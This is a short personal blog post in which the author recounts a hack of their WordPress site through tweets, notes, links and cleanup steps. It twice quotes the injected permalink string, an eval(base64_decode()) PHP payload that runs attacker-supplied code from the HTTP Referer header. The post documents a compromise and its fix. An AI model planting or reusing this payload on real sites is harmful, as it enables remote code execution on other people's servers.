Update on WP hack

Intro

For those of you who follow me via my @souterconsults account, you will have seen me have a paddy on this Friday last. That’s because my WP instance got hacked. Meh :$

So, I thought it would be useful to update anyone interested with a quick run-down, as it sets the scene for any future developments (like a complete re-build: bah).

I’m setting out here:

List of tweets, which pretty much explain what happened
Brief notes of more detail
Other links, if they’re not in the first two sections
Actions. Bah

Tweets

argh, wanting to publish my Cloud vids from YouTube, but WP is putting %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/ on URL 3:15 PM Sep 4th from twhirl
http://twurl.nl/06n2fh explains – I’m trying to find the malicious code asap :’( 3:42 PM Sep 4th from twhirl
ok, I’ve switched off the navigation on the site & parked links to comments, archive, & recent posts to help avoid people getting borked 4:02 PM Sep 4th from twhirl
Site back in action: WP Permalink config restored -http://twurl.nl/ddfchd fyi ‘Hardening WordPress’ http://twurl.nl/ih81jk 5:09 PM Sep 4th from twhirl
just blogged: Cloud Computing – YouTube videos http://twurl.nl/g38ukl 5:23 PM Sep 4th from twitterfeed
Links for WP hack %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/ again – http://twurl.nl/5qclh3 & http://twurl.nl/d55o4c 5:39 PM Sep 4th from twhirl

Notes

Was posting about YouTube videos on Cloud Computing
Copying and pasting the URL into Twhirl to send out on Twitter
Noticed there was a whole string of characters after the ‘proper’ URL
Deleted post
Republished
It was still there
Copied the string and Googled it
Found “[resolved] NASTY CODE hacks onto your domain. FIX included.” #2 in ‘Tweets’
Went on from there & blogged original post…

Looking at my install:

The plugin options table seems to have disappeared [although this may not be a bad thing – I should check the WP changelog…]
WP pages seem clean at the mo’

Various links

Worthwhile checking out

Helpful post by @matt on keeping WordPress secure. http://bit.ly/43gTBK If you’re not on 2.8.4, do the upgrade today. about 12 hours ago from Seesmic
- [Note: I think was via @wordpress & Matt Mullenweg is @photomatt (that’s enough pedantry – Ed.)]
*Anyway*, Matt recommends this.
Other links above

Actions

Need to do several more, more detailed trawls through my WP install
Probably need to do a rebuild (from scratch, preferably). Meh
Enabled various plugins, e.g. Login LockedDown, but Maintenance Mode didn’t work :-(

A shot across the bows, hopefully not much more (fingers tightly crossed).

[UPDATE: fyi I believe I was on WP v2.8.0 when I was hacked. Latest version at the time of writing is 2.8.4.

Technorati Tags: wordpress,hack,notes,links,actions,fed up,chastened

This work is licensed under a Creative Commons Attribution Non-commercial Share Alike license.

Byte Night update #1 Umm, I’ve been seriously slack in getting myself sorted for this – mega :$ However, I’ve resolved to do a...
Byte Night update #2 Hello folks, I’m thrilled to be able to say that (at the time of writing) I’ve nearly reached 2/3rds of...
Social Media at CONNECT North East This post sets out the work I have been doing with CONNECT North East which, in its own words,...
Delicious blog posting A quick note to say that I’ve been experimenting with having Delicious post my links from the previous day to...
Cloud Computing – YouTube videos Context I’m one of many who sees Cloud Computing as a major industry trend, which could be very disruptive [or...